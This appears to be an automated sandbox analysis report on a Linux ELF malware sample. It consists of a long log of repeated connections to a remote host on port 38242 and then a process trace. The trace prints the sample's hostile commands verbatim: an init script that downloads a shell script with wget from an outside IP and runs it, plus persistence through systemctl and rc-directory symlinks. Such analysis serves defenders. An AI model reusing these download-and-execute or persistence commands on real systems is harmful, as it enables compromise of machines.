Dec 24, 2024 06:29:14.580858946 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:15.036930084 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:15.037353039 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:15.418301105 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:15.538135052 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:15.538387060 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:15.538388014 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:15.658324957 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:16.046710014 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:16.208648920 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.049184084 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.079855919 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.079902887 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.080049992 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.080049992 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.168927908 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.169116974 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.169116974 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.199688911 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.288775921 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:17.676637888 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:17.836796999 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:18.281611919 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:18.281838894 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:18.678534031 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:18.798283100 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:18.798387051 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:18.798568964 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:18.918353081 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:19.306128979 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:19.468599081 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:19.926063061 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:19.926351070 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:20.308588982 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:20.428459883 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:20.428564072 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:20.428752899 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:20.548311949 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:20.936100006 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:21.100601912 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:21.549021006 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:21.549269915 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:21.938657045 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:22.058568001 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:22.058693886 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:22.058753967 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:22.178518057 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:22.566963911 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:22.728535891 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:23.189165115 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:23.189409971 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:23.568928003 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:23.688752890 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:23.689024925 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:23.689024925 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:23.808947086 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:24.196386099 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:24.360589027 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:24.818846941 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:24.819150925 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:25.198385000 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:25.318389893 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:25.318902016 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:25.318902016 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:25.438721895 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:25.828118086 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:25.988828897 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:26.453200102 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:26.453452110 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:26.830055952 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:26.950809002 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:26.951080084 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:26.951168060 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:27.070930958 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:27.461255074 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:27.628796101 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:28.089360952 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:28.089759111 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:28.464229107 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:28.584386110 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:28.584806919 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:28.585000992 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:28.704974890 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:29.100240946 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:29.260534048 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:29.725604057 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:29.726022005 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:30.102266073 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:30.222218037 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:30.222476006 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:30.222886086 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:30.342541933 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:30.741046906 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:30.904861927 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:31.359539032 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:31.359956980 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:31.743875027 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:31.863723040 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:31.864171028 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:31.864171028 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:31.984103918 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:32.376446009 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:32.536657095 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:32.980664968 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:32.980993032 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:33.378927946 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:33.498879910 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:33.499208927 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:33.499208927 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:33.618993044 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:34.008898020 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:34.176749945 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:34.627397060 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:34.627698898 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:35.011650085 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:35.131788015 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:35.132040024 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:35.132040024 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:35.251872063 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:35.641913891 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:35.804651976 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:36.260448933 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:36.260673046 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:36.644841909 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:36.764573097 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:36.764830112 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:36.764830112 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:36.888194084 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:37.273221970 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:37.436552048 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:37.902235031 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:37.902522087 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:38.275369883 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:38.395252943 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:38.395390987 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:38.395549059 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:38.515155077 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:38.904789925 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:39.072565079 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:39.517260075 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:39.517549992 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:39.907357931 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:40.027149916 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:40.027334929 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:40.027563095 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:40.147109032 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:40.535062075 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:40.696559906 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:41.143346071 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:41.143609047 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:41.543239117 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:41.662961960 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:41.663091898 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:41.663146019 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:41.782741070 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:42.170861959 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:42.332545996 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:42.800008059 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:42.800188065 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:43.173429012 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:43.293422937 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:43.293656111 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:43.293656111 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:43.413306952 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:43.801333904 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:43.964503050 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:44.416484118 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:44.416713953 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:44.803729057 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:44.923567057 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:44.923790932 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:44.923790932 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:45.043637037 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:45.431685925 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:45.592441082 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:46.061125994 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:46.061317921 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:46.433372021 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:46.553349972 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:46.553520918 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:46.553574085 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:46.673938990 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:47.061218023 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:47.224519968 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:47.672163010 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:47.672389984 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:48.063596010 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:48.183815002 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:48.183985949 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:48.184053898 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:48.303908110 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:48.692013025 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:48.856642008 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:49.299174070 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:49.299381018 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:49.693931103 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:49.813705921 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:49.814050913 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:49.814052105 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:49.933828115 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:50.326703072 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:50.488706112 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:50.947650909 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:50.947863102 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:51.329237938 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:51.449407101 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:51.449733973 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:51.449840069 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:51.570194960 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:51.959971905 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:52.120372057 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:52.572336912 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:52.572936058 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:52.963162899 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:53.083342075 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:53.083915949 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:53.083916903 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:53.203927040 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:53.590538025 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:53.752321959 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:54.207753897 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:54.207958937 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:54.592212915 CET	60176	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:54.711956024 CET	38242	60176	94.156.227.234	192.168.2.23
Dec 24, 2024 06:29:54.712105036 CET	60176	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:54.712158918 CET	60176	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:29:54.832442999 CET	38242	60176	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: dash PID: 6221, Parent PID: 4332

General

Start time (UTC):	05:27:46
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:46
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	05:27:46
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:46
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	/tmp/sh4.nn.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh4.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	05:27:48
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	05:27:49
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:27:50
Start date (UTC):	24/12/2024
